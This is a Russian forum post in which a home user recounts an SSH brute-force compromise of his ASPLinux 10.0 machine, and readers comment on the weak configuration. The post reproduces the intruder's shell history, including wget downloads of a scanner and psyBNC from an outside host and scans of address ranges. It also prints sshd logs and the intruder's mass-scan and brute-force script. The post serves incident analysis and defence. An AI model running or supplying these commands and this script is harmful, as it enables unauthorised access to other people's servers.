История одного красивого взлома ASPLinux 10.0

Аватар пользователя Ambrosim

История одного красивого взлома ASPLinux 10.0

или "Пособие для начинающего хакера"

Уже писал аннотацию этой детективной истории, а сегодня что-то стал раздумывать, стоит ли заниматься этим возможно бесполезным занятием? Ведь знаменитый Линукс был взломан всего за пару часов, не проще ли вернуться на винду и спокойно продолжать в ней работать? Тем более что писанины и материалов на эту скопилось много.
В итоге, раз пообещал, решил все же написать, может, пригодится народу. В линуксе по большому счету считаю себя профаном, но в так нелюбимой здесь винде кое-что соображаю, поэтому отчасти понял, что произошло. Пока излагаю только голые факты, вопросы задавать буду потом.
Итак, приступим Катается от смеха

Часть 1

Работал раньше в Линуксе немного, ставил раньше его несколько раз, в основном Мандрейки и Редхаты, поигрался да возвращался на виндовс - несерьезные какие-то они, для моделистов-конструкторов, но не для работы. А когда взял поиграться ASPLinux 10.0, понравилось - установка прошла без одной запинки, все заработало сразу и вид имеет человеческий. Проводил всякие безобидные эксперименты типа установки Open Office да лазил по Internet.
Отмечу, что когда проводил установку, было предложено настроить файрвол. После некоторых раздумий я позапрещал все предложенные протоколы, поснимав соответствующие галки на протоколах и больше к этому вопросу не возвращался, полагая, что установлена самая максимальная зашита из возможного, что предлагает ASPLinux. Как затем выяснилось, это были мои наивные предположения Улыбка

Вот так я работал несколько месяцев, как вдруг, вчера, находяся в Internet, мне чего-то занадобилось поправить под рутом. Залез в консоль, ввел рута, пароль - как вдруг - облом, не пущает. Понятно, не ту педаль на клаве нажал - еще раз, - и снова не пускает! Опана, это еще за сюрприз?! Может, пароль забыл? Пошарил в записях - нет, все правильно :-o Что еще можно сделать? Взял да и перезагрузился - но эффект стабильный, как курс долара в течении часа. Это уже называется картина маслом "Приплыли :-(". Поскольку, как возвращать утеряный пароль у меня никакого опыта нет, к тому же какого &^%$ он поменялся - наверняка ASPLinux глюкавый, не иначе! Хотя - может и вирус нашкодил, хотя говорят, нет вирусов в линуксе, может, появились уже?
Пока я проводил время в грустных размышлениях, меланхолично нажимая в консоли стрелки "вверх-вниз", как вдруг увидел (благодаря им) в хистори консольных команд какую-то чудную неизвестную мне команду w. Заинтересовавшись, начал просматривать все консольные команды - елы-палы, да тут таких незвестных команд полно!!! Кто же их выдавал-то?!! Уж никак не я - я таких команд совсем не знаю!!! Вот у меня волосы стали шевелиться - что происходит?!! Грустный
Смотрите сами - вот эти команды (коментарии, где понял ситуацию, мои):

1 ls осмотрелся
2 cd Desktop
3 ls осмотрелся на рабочем столе
4 ls
5 w ознакомился с пользователями
6 passwd видать, сменил пароль? Но чей?
7 cat /proc/cpuinfo поглядел на железо
8 cd /var/tmp
9 ls
10 mkdir scan свил гнездо для хакерской проги
11 cd scan
12 wget jonny.ro/wow.tgz залил хакерскую прогу №1
13 cd ..
14 mkdir bnc свил гнездо для хакерской проги №2
15 cd bnc
16 wget jonny.ro/psyBNC2.3.1.tar.gz залил хакерскую прогу №2
17 tar -zxvf psyBNC2.3.1.tar.gz разахивировал хакерскую прогу №2
18 cat /etc/issue
19 cd psybnc
20 make откомпилял хакерскую прогу №2 (вот гад!)
21 ./psybnc
22 ps -aux
23 kill -9 9952 убил какой-то процесс
24 cd ..
25 cd ..
26 cd scan/ssh
27 ./assh 212.144
28 cd scan
29 cd ssh
30 ls
31 tar -zxvf wow.gz ошибся малость
32 tar -zxvf wow.tgz разархивировал хакерскую прогу №1
33 cd ssh
34 ./assh 212.144 здесь и далее мне непонятно
35 ./assh 214.162
36 ./assh 214.168
37 ./assh 214.145
38 ./assh 210.144
39 ls
40 w
41 uptime
42 ls
43 cd desktop
44 w
45 kill
46 passwd
47 w
48 -bash
49 cd
50 cd /var/tmp/scan/ssh
51 ./assh 195.233
52 ./assh 212.167
53 whoami
54 ./assh 195.28
55 ls
56 cd mbox
57 w
58 exit
59 passwd
60 exit засим откланялся Улыбка

(продолжение на 2-й странице)

Часть 2

Лог безопасности.
Вообще, логи - хорошее изобретение! О многом могут рассказать. Если хакеры их за собой не потерли Катается от смеха
В данном случае - не потерли, то ли не успели, то ли собирались сделать в следующем визите.

Итак, атака началась в 17:32:43
Идут попытки залогиниться под именами всяких там "ноубоди", "патриков", "роло" и т.д.
Попытки идут с большой частотой, невозможной для клавиатуры, понятно, что работает специализированный сканер, который генерирует разные имена и прощупывает разные порты.
Попытки вначале терпят неудачу:

Mar 19 17:31:43 ip sshd[8553]: Did not receive identification string from ::ffff:212.148.176.67
Mar 19 17:43:41 ip sshd[9169]: Failed password for nobody from ::ffff:212.148.176.67 port 3415 ssh2
Mar 19 17:43:42 ip sshd[9171]: Illegal user patrick from ::ffff:212.148.176.67
Mar 19 17:43:42 ip sshd[9171]: error: Could not get shadow information for NOUSER
Mar 19 17:43:42 ip sshd[9171]: Failed password for illegal user patrick from ::ffff:212.148.176.67 port 3459 ssh2
Mar 19 17:43:43 ip sshd[9173]: Illegal user patrick from ::ffff:212.148.176.67
Mar 19 17:43:43 ip sshd[9173]: error: Could not get shadow information for NOUSER
Mar 19 17:43:43 ip sshd[9173]: Failed password for illegal user patrick from ::ffff:212.148.176.67 port 3818 ssh2
Mar 19 17:43:44 ip sshd[9175]: Failed password for root from ::ffff:212.148.176.67 port 3872 ssh2
Mar 19 17:43:46 ip sshd[9177]: Failed password for root from ::ffff:212.148.176.67 port 3969 ssh2
Mar 19 17:43:47 ip sshd[9179]: Accepted password for root from ::ffff:212.148.176.67 port 4020 ssh2
Mar 19 17:43:54 ip sshd[9213]: Failed password for root from ::ffff:212.148.176.67 port 4975 ssh2
Mar 19 17:43:55 ip sshd[9215]: Failed password for root from ::ffff:212.148.176.67 port 1098 ssh2
Mar 19 17:43:56 ip sshd[9217]: Illegal user rolo from ::ffff:212.148.176.67
Mar 19 17:43:56 ip sshd[9217]: error: Could not get shadow information for NOUSER
Mar 19 17:43:56 ip sshd[9217]: Failed password for illegal user rolo from ::ffff:212.148.176.67 port 1133 ssh2
Mar 19 17:43:58 ip sshd[9219]: Illegal user iceuser from ::ffff:212.148.176.67
Mar 19 17:43:58 ip sshd[9219]: error: Could not get shadow information for NOUSER
Mar 19 17:43:58 ip sshd[9219]: Failed password for illegal user iceuser from ::ffff:212.148.176.67 port 1446 ssh2
Mar 19 17:43:59 ip sshd[9221]: Illegal user horde from ::ffff:212.148.176.67
Mar 19 17:43:59 ip sshd[9221]: error: Could not get shadow information for NOUSER
Mar 19 17:43:59 ip sshd[9221]: Failed password for illegal user horde from ::ffff:212.148.176.67 port 1523 ssh2
Mar 19 17:44:01 ip sshd[9223]: Illegal user cyrus from ::ffff:212.148.176.67
Mar 19 17:44:01 ip sshd[9223]: error: Could not get shadow information for NOUSER
Mar 19 17:44:01 ip sshd[9223]: Failed password for illegal user cyrus from ::ffff:212.148.176.67 port 1652 ssh2
Mar 19 17:44:02 ip sshd[9225]: Illegal user www from ::ffff:212.148.176.67
Mar 19 17:44:02 ip sshd[9225]: error: Could not get shadow information for NOUSER
Mar 19 17:44:02 ip sshd[9225]: Failed password for illegal user www from ::ffff:212.148.176.67 port 1701 ssh2
Mar 19 17:44:03 ip sshd[9227]: Illegal user wwwrun from ::ffff:212.148.176.67
Mar 19 17:44:03 ip sshd[9227]: error: Could not get shadow information for NOUSER
Mar 19 17:44:03 ip sshd[9227]: Failed password for illegal user wwwrun from ::ffff:212.148.176.67 port 2011 ssh2
Mar 19 17:44:04 ip sshd[9229]: Illegal user matt from ::ffff:212.148.176.67
Mar 19 17:44:04 ip sshd[9229]: error: Could not get shadow information for NOUSER
Mar 19 17:44:04 ip sshd[9229]: Failed password for illegal user matt from ::ffff:212.148.176.67 port 2102 ssh2
Mar 19 17:44:06 ip sshd[9231]: Illegal user test from ::ffff:212.148.176.67
Mar 19 17:44:06 ip sshd[9231]: error: Could not get shadow information for NOUSER
Mar 19 17:44:06 ip sshd[9231]: Failed password for illegal user test from ::ffff:212.148.176.67 port 2202 ssh2
Mar 19 17:44:07 ip sshd[9233]: Illegal user test from ::ffff:212.148.176.67
Mar 19 17:44:07 ip sshd[9233]: error: Could not get shadow information for NOUSER
Mar 19 17:44:07 ip sshd[9233]: Failed password for illegal user test from ::ffff:212.148.176.67 port 2242 ssh2
Mar 19 17:44:08 ip sshd[9235]: Illegal user test from ::ffff:212.148.176.67
Mar 19 17:44:08 ip sshd[9235]: error: Could not get shadow information for NOUSER
Mar 19 17:44:08 ip sshd[9235]: Failed password for illegal user test from ::ffff:212.148.176.67 port 2548 ssh2
Mar 19 17:44:09 ip sshd[9237]: Illegal user test from ::ffff:212.148.176.67
Mar 19 17:44:09 ip sshd[9237]: error: Could not get shadow information for NOUSER
Mar 19 17:44:09 ip sshd[9237]: Failed password for illegal user test from ::ffff:212.148.176.67 port 2608 ssh2
Mar 19 17:44:10 ip sshd[9240]: Illegal user www-data from ::ffff:212.148.176.67
Mar 19 17:44:10 ip sshd[9240]: error: Could not get shadow information for NOUSER
Mar 19 17:44:10 ip sshd[9240]: Failed password for illegal user www-data from ::ffff:212.148.176.67 port 2730 ssh2
Mar 19 17:44:12 ip sshd[9242]: User mysql not allowed because account is locked
Mar 19 17:44:12 ip sshd[9242]: error: Could not get shadow information for NOUSER
Mar 19 17:44:12 ip sshd[9242]: Failed password for illegal user mysql from ::ffff:212.148.176.67 port 2775 ssh2
Mar 19 17:44:13 ip sshd[9244]: Failed password for operator from ::ffff:212.148.176.67 port 3090 ssh2
Mar 19 17:44:14 ip sshd[9246]: Failed password for adm from ::ffff:212.148.176.67 port 3175 ssh2
Mar 19 17:44:16 ip sshd[9248]: User apache not allowed because account is locked
Mar 19 17:44:16 ip sshd[9248]: error: Could not get shadow information for NOUSER
Mar 19 17:44:16 ip sshd[9248]: Failed password for illegal user apache from ::ffff:212.148.176.67 port 3285 ssh2
Mar 19 17:44:21 ip sshd[9250]: Illegal user irc from ::ffff:212.148.176.67
Mar 19 17:44:21 ip sshd[9250]: error: Could not get shadow information for NOUSER
Mar 19 17:44:21 ip sshd[9250]: Failed password for illegal user irc from ::ffff:212.148.176.67 port 3628 ssh2
Mar 19 17:44:22 ip sshd[9252]: Illegal user irc from ::ffff:212.148.176.67
Mar 19 17:44:22 ip sshd[9252]: error: Could not get shadow information for NOUSER
Mar 19 17:44:22 ip sshd[9252]: Failed password for illegal user irc from ::ffff:212.148.176.67 port 3900 ssh2
Mar 19 17:44:23 ip sshd[9254]: Failed password for adm from ::ffff:212.148.176.67 port 4245 ssh2
Mar 19 17:44:24 ip sshd[9256]: Failed password for root from ::ffff:212.148.176.67 port 4312 ssh2
Mar 19 17:44:26 ip sshd[9258]: Failed password for root from ::ffff:212.148.176.67 port 4413 ssh2
Mar 19 17:44:27 ip sshd[9260]: Failed password for root from ::ffff:212.148.176.67 port 4456 ssh2
Mar 19 17:44:28 ip sshd[9262]: Illegal user jane from ::ffff:212.148.176.67
Mar 19 17:44:28 ip sshd[9262]: error: Could not get shadow information for NOUSER
Mar 19 17:44:28 ip sshd[9262]: Failed password for illegal user jane from ::ffff:212.148.176.67 port 4766 ssh2
Mar 19 17:44:29 ip sshd[9264]: Illegal user pamela from ::ffff:212.148.176.67
Mar 19 17:44:29 ip sshd[9264]: error: Could not get shadow information for NOUSER
Mar 19 17:44:29 ip sshd[9264]: Failed password for illegal user pamela from ::ffff:212.148.176.67 port 4832 ssh2

Наконец, конкретная серия безуспешных атак на рутовский акаунт по защищенному протоколу SSH:

Mar 19 17:44:31 ip sshd[9266]: Failed password for root from ::ffff:212.148.176.67 port 4973 ssh2
Mar 19 17:44:32 ip sshd[9268]: Failed password for root from ::ffff:212.148.176.67 port 1326 ssh2
Mar 19 17:44:33 ip sshd[9270]: Failed password for root from ::ffff:212.148.176.67 port 1444 ssh2
Mar 19 17:44:34 ip sshd[9272]: Failed password for root from ::ffff:212.148.176.67 port 1505 ssh2
Mar 19 17:44:36 ip sshd[9274]: Failed password for root from ::ffff:212.148.176.67 port 1616 ssh2
Mar 19 17:44:37 ip sshd[9276]: Illegal user cosmin from ::ffff:212.148.176.67
Mar 19 17:44:37 ip sshd[9276]: error: Could not get shadow information for NOUSER
Mar 19 17:44:37 ip sshd[9276]: Failed password for illegal user cosmin from ::ffff:212.148.176.67 port 1670 ssh2
Mar 19 17:44:38 ip sshd[9278]: Failed password for root from ::ffff:212.148.176.67 port 2051 ssh2
Mar 19 17:44:39 ip sshd[9280]: Failed password for root from ::ffff:212.148.176.67 port 2107 ssh2
Mar 19 17:44:41 ip sshd[9282]: Failed password for root from ::ffff:212.148.176.67 port 2218 ssh2
Mar 19 17:44:42 ip sshd[9284]: Failed password for root from ::ffff:212.148.176.67 port 2272 ssh2
Mar 19 17:44:43 ip sshd[9286]: Failed password for root from ::ffff:212.148.176.67 port 2613 ssh2
Mar 19 17:44:44 ip sshd[9288]: Failed password for root from ::ffff:212.148.176.67 port 2682 ssh2
Mar 19 17:44:45 ip sshd[9292]: Failed password for root from ::ffff:212.148.176.67 port 2732 ssh2
Mar 19 17:44:46 ip sshd[9294]: Failed password for root from ::ffff:212.148.176.67 port 2856 ssh2
Mar 19 17:44:48 ip sshd[9296]: Failed password for root from ::ffff:212.148.176.67 port 3214 ssh2
Mar 19 17:44:49 ip sshd[9298]: Failed password for root from ::ffff:212.148.176.67 port 3283 ssh2
Mar 19 17:44:50 ip sshd[9300]: Failed password for root from ::ffff:212.148.176.67 port 3334 ssh2
Mar 19 17:44:51 ip sshd[9302]: Failed password for root from ::ffff:212.148.176.67 port 3463 ssh2
Mar 19 17:44:52 ip sshd[9304]: Failed password for root from ::ffff:212.148.176.67 port 3815 ssh2
Mar 19 17:44:54 ip sshd[9310]: Failed password for root from ::ffff:212.148.176.67 port 3887 ssh2
Mar 19 17:44:55 ip sshd[9312]: Failed password for root from ::ffff:212.148.176.67 port 3944 ssh2
Mar 19 17:44:56 ip sshd[9318]: Failed password for root from ::ffff:212.148.176.67 port 4054 ssh2
Mar 19 17:44:57 ip sshd[9325]: Failed password for root from ::ffff:212.148.176.67 port 4093 ssh2
Mar 19 17:44:58 ip sshd[9333]: Failed password for root from ::ffff:212.148.176.67 port 4472 ssh2
Mar 19 17:44:59 ip sshd[9340]: Failed password for root from ::ffff:212.148.176.67 port 4528 ssh2
Mar 19 17:45:00 ip sshd[9344]: Failed password for root from ::ffff:212.148.176.67 port 4628 ssh2
Mar 19 17:45:02 ip sshd[9353]: Failed password for root from ::ffff:212.148.176.67 port 4675 ssh2
Mar 19 17:45:03 ip sshd[9358]: Failed password for root from ::ffff:212.148.176.67 port 1033 ssh2
Mar 19 17:45:04 ip sshd[9367]: Failed password for root from ::ffff:212.148.176.67 port 1100 ssh2
Mar 19 17:45:05 ip sshd[9377]: Failed password for root from ::ffff:212.148.176.67 port 1155 ssh2
Mar 19 17:45:06 ip sshd[9385]: Failed password for root from ::ffff:212.148.176.67 port 1274 ssh2
Mar 19 17:45:07 ip sshd[9393]: Failed password for root from ::ffff:212.148.176.67 port 1606 ssh2
Mar 19 17:45:08 ip sshd[9399]: Failed password for root from ::ffff:212.148.176.67 port 1674 ssh2
Mar 19 17:45:10 ip sshd[9406]: Failed password for root from ::ffff:212.148.176.67 port 1726 ssh2
Mar 19 17:45:11 ip sshd[9413]: Failed password for root from ::ffff:212.148.176.67 port 1836 ssh2
Mar 19 17:45:12 ip sshd[9421]: Failed password for root from ::ffff:212.148.176.67 port 1883 ssh2
Mar 19 17:45:13 ip sshd[9427]: Failed password for root from ::ffff:212.148.176.67 port 2238 ssh2
Mar 19 17:45:14 ip sshd[9433]: Failed password for root from ::ffff:212.148.176.67 port 2295 ssh2
Mar 19 17:45:15 ip sshd[9443]: Failed password for root from ::ffff:212.148.176.67 port 2408 ssh2
Mar 19 17:45:17 ip sshd[9449]: Failed password for root from ::ffff:212.148.176.67 port 2444 ssh2
Mar 19 17:45:18 ip sshd[9461]: Failed password for root from ::ffff:212.148.176.67 port 2816 ssh2
Mar 19 17:45:19 ip sshd[9470]: Failed password for root from ::ffff:212.148.176.67 port 2875 ssh2
Mar 19 17:45:20 ip sshd[9479]: Illegal user cip52 from ::ffff:212.148.176.67
Mar 19 17:45:20 ip sshd[9479]: error: Could not get shadow information for NOUSER
Mar 19 17:45:20 ip sshd[9479]: Failed password for illegal user cip52 from ::ffff:212.148.176.67 port 2976 ssh2
Mar 19 17:45:21 ip sshd[9487]: Illegal user cip51 from ::ffff:212.148.176.67
Mar 19 17:45:21 ip sshd[9487]: error: Could not get shadow information for NOUSER
Mar 19 17:45:21 ip sshd[9487]: Failed password for illegal user cip51 from ::ffff:212.148.176.67 port 3021 ssh2
Mar 19 17:45:23 ip sshd[9495]: Failed password for root from ::ffff:212.148.176.67 port 3362 ssh2
Mar 19 17:45:24 ip sshd[9499]: Illegal user noc from ::ffff:212.148.176.67
Mar 19 17:45:24 ip sshd[9499]: error: Could not get shadow information for NOUSER
Mar 19 17:45:24 ip sshd[9499]: Failed password for illegal user noc from ::ffff:212.148.176.67 port 3436 ssh2
Mar 19 17:45:25 ip sshd[9504]: Failed password for root from ::ffff:212.148.176.67 port 3492 ssh2
Mar 19 17:45:26 ip sshd[9511]: Failed password for root from ::ffff:212.148.176.67 port 3602 ssh2
Mar 19 17:45:27 ip sshd[9517]: Failed password for root from ::ffff:212.148.176.67 port 3925 ssh2
Mar 19 17:45:28 ip sshd[9523]: Failed password for root from ::ffff:212.148.176.67 port 3996 ssh2
Mar 19 17:45:29 ip sshd[9530]: Illegal user webmaster from ::ffff:212.148.176.67
Mar 19 17:45:29 ip sshd[9530]: error: Could not get shadow information for NOUSER
Mar 19 17:45:29 ip sshd[9530]: Failed password for illegal user webmaster from ::ffff:212.148.176.67 port 4042 ssh2
Mar 19 17:45:31 ip sshd[9538]: Illegal user data from ::ffff:212.148.176.67
Mar 19 17:45:31 ip sshd[9538]: error: Could not get shadow information for NOUSER
Mar 19 17:45:31 ip sshd[9538]: Failed password for illegal user data from ::ffff:212.148.176.67 port 4141 ssh2
Mar 19 17:45:32 ip sshd[9545]: Illegal user user from ::ffff:212.148.176.67
Mar 19 17:45:32 ip sshd[9545]: error: Could not get shadow information for NOUSER
Mar 19 17:45:32 ip sshd[9545]: Failed password for illegal user user from ::ffff:212.148.176.67 port 4180 ssh2
Mar 19 17:45:33 ip sshd[9550]: Illegal user user from ::ffff:212.148.176.67
Mar 19 17:45:33 ip sshd[9550]: error: Could not get shadow information for NOUSER
Mar 19 17:45:33 ip sshd[9550]: Failed password for illegal user user from ::ffff:212.148.176.67 port 4542 ssh2
Mar 19 17:45:35 ip sshd[9556]: Illegal user user from ::ffff:212.148.176.67
Mar 19 17:45:35 ip sshd[9556]: error: Could not get shadow information for NOUSER
Mar 19 17:45:35 ip sshd[9556]: Failed password for illegal user user from ::ffff:212.148.176.67 port 4603 ssh2
Mar 19 17:45:36 ip sshd[9566]: Illegal user web from ::ffff:212.148.176.67
Mar 19 17:45:36 ip sshd[9566]: error: Could not get shadow information for NOUSER
Mar 19 17:45:36 ip sshd[9566]: Failed password for illegal user web from ::ffff:212.148.176.67 port 4732 ssh2
Mar 19 17:45:37 ip sshd[9571]: Illegal user web from ::ffff:212.148.176.67
Mar 19 17:45:37 ip sshd[9571]: error: Could not get shadow information for NOUSER
Mar 19 17:45:37 ip sshd[9571]: Failed password for illegal user web from ::ffff:212.148.176.67 port 1067 ssh2
Mar 19 17:45:38 ip sshd[9575]: Illegal user oracle from ::ffff:212.148.176.67
Mar 19 17:45:38 ip sshd[9575]: error: Could not get shadow information for NOUSER
Mar 19 17:45:38 ip sshd[9575]: Failed password for illegal user oracle from ::ffff:212.148.176.67 port 1135 ssh2
Mar 19 17:45:40 ip sshd[9582]: Illegal user sybase from ::ffff:212.148.176.67
Mar 19 17:45:40 ip sshd[9582]: error: Could not get shadow information for NOUSER
Mar 19 17:45:40 ip sshd[9582]: Failed password for illegal user sybase from ::ffff:212.148.176.67 port 1177 ssh2
Mar 19 17:45:41 ip sshd[9591]: Illegal user master from ::ffff:212.148.176.67
Mar 19 17:45:41 ip sshd[9591]: error: Could not get shadow information for NOUSER
Mar 19 17:45:41 ip sshd[9591]: Failed password for illegal user master from ::ffff:212.148.176.67 port 1277 ssh2
Mar 19 17:45:45 ip sshd[9608]: Illegal user account from ::ffff:212.148.176.67
Mar 19 17:45:45 ip sshd[9608]: error: Could not get shadow information for NOUSER
Mar 19 17:45:45 ip sshd[9608]: Failed password for illegal user account from ::ffff:212.148.176.67 port 1309 ssh2
Mar 19 17:45:46 ip sshd[9615]: Illegal user backup from ::ffff:212.148.176.67
Mar 19 17:45:46 ip sshd[9615]: error: Could not get shadow information for NOUSER
Mar 19 17:45:46 ip sshd[9615]: Failed password for illegal user backup from ::ffff:212.148.176.67 port 1837 ssh2
Mar 19 17:45:48 ip sshd[9621]: Illegal user server from ::ffff:212.148.176.67
Mar 19 17:45:48 ip sshd[9621]: error: Could not get shadow information for NOUSER
Mar 19 17:45:48 ip sshd[9621]: Failed password for illegal user server from ::ffff:212.148.176.67 port 2148 ssh2
Mar 19 17:45:49 ip sshd[9630]: Illegal user adam from ::ffff:212.148.176.67
Mar 19 17:45:49 ip sshd[9630]: error: Could not get shadow information for NOUSER
Mar 19 17:45:49 ip sshd[9630]: Failed password for illegal user adam from ::ffff:212.148.176.67 port 2222 ssh2
Mar 19 17:45:50 ip sshd[9638]: Illegal user alan from ::ffff:212.148.176.67
Mar 19 17:45:50 ip sshd[9638]: error: Could not get shadow information for NOUSER
Mar 19 17:45:50 ip sshd[9638]: Failed password for illegal user alan from ::ffff:212.148.176.67 port 2272 ssh2
Mar 19 17:45:51 ip sshd[9642]: Illegal user frank from ::ffff:212.148.176.67
Mar 19 17:45:51 ip sshd[9642]: error: Could not get shadow information for NOUSER
Mar 19 17:45:51 ip sshd[9642]: Failed password for illegal user frank from ::ffff:212.148.176.67 port 2370 ssh2
Mar 19 17:45:52 ip sshd[9648]: Illegal user george from ::ffff:212.148.176.67
Mar 19 17:45:52 ip sshd[9648]: error: Could not get shadow information for NOUSER
Mar 19 17:45:52 ip sshd[9648]: Failed password for illegal user george from ::ffff:212.148.176.67 port 2649 ssh2
Mar 19 17:45:53 ip sshd[9652]: Illegal user henry from ::ffff:212.148.176.67
Mar 19 17:45:53 ip sshd[9652]: error: Could not get shadow information for NOUSER
Mar 19 17:45:53 ip sshd[9652]: Failed password for illegal user henry from ::ffff:212.148.176.67 port 2776 ssh2
Mar 19 17:45:55 ip sshd[9659]: Illegal user john from ::ffff:212.148.176.67
Mar 19 17:45:55 ip sshd[9659]: error: Could not get shadow information for NOUSER
Mar 19 17:45:55 ip sshd[9659]: Failed password for illegal user john from ::ffff:212.148.176.67 port 2827 ssh2
Mar 19 17:45:56 ip sshd[9664]: Failed password for root from ::ffff:212.148.176.67 port 2916 ssh2
Mar 19 17:45:57 ip sshd[9666]: Failed password for root from ::ffff:212.148.176.67 port 2951 ssh2
Mar 19 17:45:58 ip sshd[9668]: Failed password for root from ::ffff:212.148.176.67 port 3312 ssh2
Mar 19 17:45:59 ip sshd[9670]: Failed password for root from ::ffff:212.148.176.67 port 3355 ssh2
Mar 19 17:46:00 ip sshd[9672]: Failed password for root from ::ffff:212.148.176.67 port 3453 ssh2
Mar 19 17:46:02 ip sshd[9677]: Illegal user test from ::ffff:212.148.176.67
Mar 19 17:46:02 ip sshd[9677]: error: Could not get shadow information for NOUSER
Mar 19 17:46:02 ip sshd[9677]: Failed password for illegal user test from ::ffff:212.148.176.67 port 3489 ssh2

Попытка сменить свой адрес, и тут же - удача! Грустный
АСП-линукс схавал очередной подсунутый "пряник"

Mar 19 17:46:27 ip sshd[9697]: Accepted password for root from ::ffff:172.180.130.23 port 1524 ssh2[/]
Mar 19 17:52:16 ip sshd[10022]: Failed password for root from ::ffff:81.180.100.39 port 1309 ssh2
Mar 19 17:52:19 ip sshd[10022]: Accepted password for root from ::ffff:81.180.100.39 port 1309 ssh2
Mar 19 17:58:01 ip sshd[10123]: Accepted password for root from ::ffff:220.59.133.38 port 1961 ssh2
Mar 19 17:59:10 ip sshd[10159]: Accepted password for root from ::ffff:220.59.133.38 port 3914 ssh2
Mar 19 17:59:39 ip sshd[10194]: Accepted password for root from ::ffff:172.180.130.23 port 1619 ssh2
Mar 19 18:04:39 ip sshd[10360]: Accepted password for root from ::ffff:81.180.100.39 port 1347 ssh2
Mar 19 18:27:09 ip sshd[10873]: Failed password for root from ::ffff:214.162.160.238 port 62284 ssh2

и дальше, вероятно, был просто растерзан командами, изложенными в "Части 1":

Mar 19 18:27:28 ip last message repeated 2 times
Mar 19 18:27:56 ip sshd[10886]: Illegal user peter from ::ffff:214.162.160.238
Mar 19 18:27:56 ip sshd[10886]: Failed none for illegal user peter from ::ffff:214.162.160.238 port 62286 ssh2
Mar 19 18:28:00 ip sshd[10886]: error: Could not get shadow information for NOUSER
Mar 19 18:28:00 ip sshd[10886]: Failed password for illegal user peter from ::ffff:214.162.160.238 port 62286 ssh2
Mar 19 18:28:07 ip last message repeated 2 times
Mar 19 18:28:37 ip sshd[10888]: Failed password for root from ::ffff:214.162.160.238 port 62287 ssh2
Mar 19 18:28:48 ip last message repeated 2 times
Mar 19 19:17:23 ip sshd[3223]: Received signal 15; terminating.

(продолжение на 3-й странице)

Часть 3

Теперь заглянем во внутренности обеих хакерских программ.

В программе wow.tgz есть файлик с таким текстом:

#!/bin/bash
if [ $# != 1 ]; then
        echo \\\" usage: $0 <b class>\\\"
        exit;
fi

echo \\\"       Versiune de scaner privata!\\\"
echo \\\"----------------------------------------------------\\\"
echo \\\"           All my love for Liz!                     \\\"     
echo \\\"----------------------------------------------------\\\"
echo \\\"# incep scanarea ...\\\"
./pscan2 $1 22 

sleep 10
cat $1.pscan.22 |sort |uniq > uniq.txt
oopsnr2=`grep -c . uniq.txt`
echo \\\"# Am gasit $oopsnr2 de servere\\\"
echo \\\"----------------------------------------\\\"
echo \\\"# Incepem...\\\"
./sshf 50
rm -rf $1.pscan.22 uniq.txt
echo \\\"Asta a fost tot\\\"

а в программе psyBNC2.3.1.tar.gz и вовсе лежит увесистое описалово с именем Readme, из-за большого размера которого приатачиваю его в соответствующий пост форума.

(продолжение на 4-й странице)

И в завершение - остросюжетные вопросы:

1. Так ли уж защищен Линукс или это слабость конкретной реализации ASPLlinux?

2. Что заложили создатели ASPLinux в случае начальных настроек файрвола ASPLinux 10, когда в его интерфейсе было задано "Все запретить?" (как я понял, iptables),
Какой прок тогда от такого файрвола с этими настройками - создание иллюзии защиты, что ли?
Неужели еще и руками надо конфиги править, чтобы защита была полноценная? Не всякий обычный пользователь сможет это сделать, да и не удобно делать это в текстах - малейшая ошибка, не там запятая - сразу брешь. Если была бы оболочка для настройки, другое дело, и не обязательно она должна быть графической, консольная вполне бы сошла.

3. Хочу понять, каким образом хакеры так легко получили возможность доступа к рут-акаунту.
У меня лишь свои догадки, которые уже описал, но нет твердой уверенности в этих выводах

4. Что нужно сделать с текущей инсталяцией ASP? Указанные папки и файлы уничтожил. Или защита считается скомпроментированой и система подлежит переинсталляции?

5. И наконец - как защититься, чтобы чувствовать себя в линуксе, как кто-то уже выразился, в "броненосце"?

Your rating: Нет Average: 5.2 (14 votes)

Комментарии

Аватар пользователя BaZilio

Re: История одного красивого взлома ASPLinux 10.0

ASPLinux как дистрибутив не при чём, точно такое случилось бы с кем угодно, и на каком угодно дистре. Проблема очевидна, это факт - руки.
Понятное дело, что человек, всю жизнь юзавший винду доверяет больше GUI-конфигураторам нежели текстовым конфигам, но разумный человек наверное полез бы, и проверил то, что конфигуратор ему написал в правила iptables!
И ещё - если не планировал удалённо входить на свою машину, то отключил бы sshd...
Теперь пункт 2 - в конфиге sshd в ASPLinux по умолчанию включена опция PermitRootLogin. Вот это действительно зря, т.к. позволяет брутфорсить пароль рута. Спишем это на равнозначный промах ASPLinux и промах пользователя конкретной системы. Устранение таких "дырок" должно быть просто в крови - поставил систему, - тут же всё настрой. Особенно помогает носить с собой основные конфиги, если приходится часто кому-то помогать, или хотя бы помнить где что наиболее небезопасно оставлять включённым.
Пункт 3 - логи не мешало бы смотреть почаще, не зря они пишутся...

В целом - списать подобное происшествие можно только на неопытность и на некоторые распространённый мифы о Linux. Пожелаю автору больше веры в текстовые конфиги ;)

ЗЫ А взлом наверное не красивый, а просто смешной...

Аватар пользователя Гость

Re: История одного красивого взлома ASPLinux 10.0

Точно - это не взлом! А просто детская забава на чайником не соображающим, что он делает. Попробовал бы он винду таким же макаром в интернет выставить! Катается от смеха :-D

Аватар пользователя kvs

Re: История одного красивого взлома ASPLinux 10.0

А все таки интересно, каким макаром сие случай произошел, потому как недавно обнаружил у себя в логах что-то очень похожее.
ar 19 17:31:43 ip sshd[8553]: Did not receive identification string from ::ffff:212.148.176.67
Mar 19 17:43:41 ip sshd[9169]: Failed password for nobody from ::ffff:212.148.176.67 port 3415 ssh2
Mar 19 17:43:42 ip sshd[9171]: Illegal user patrick from ::ffff:212.148.176.67
Mar 19 17:43:42 ip sshd[9171]: error: Could not get shadow information for NOUSER
Mar 19 17:43:42 ip sshd[9171]: Failed password for illegal user patrick from ::ffff:212.148.176.67 port 3459 ssh2
Mar 19 17:43:43 ip sshd[9173]: Illegal user patrick from ::ffff:212.148.176.67
Mar 19 17:43:43 ip sshd[9173]: error: Could not get shadow information for NOUSER
Mar 19 17:43:43 ip sshd[9173]: Failed password for illegal user patrick from ::ffff:212.148.176.67 port 3818 ssh2
Mar 19 17:43:44 ip sshd[9175]: Failed password for root from ::ffff:212.148.176.67 port 3872 ssh2
Mar 19 17:43:46 ip sshd[9177]: Failed password for root from ::ffff:212.148.176.67 port 3969 ssh2

Откуда, и почему, фаер у меня настроен нормально, прежде чем запускать с работу сервак, пробивал его снаружи, все закрыто. Фаер настраивал ручками.

Аватар пользователя host

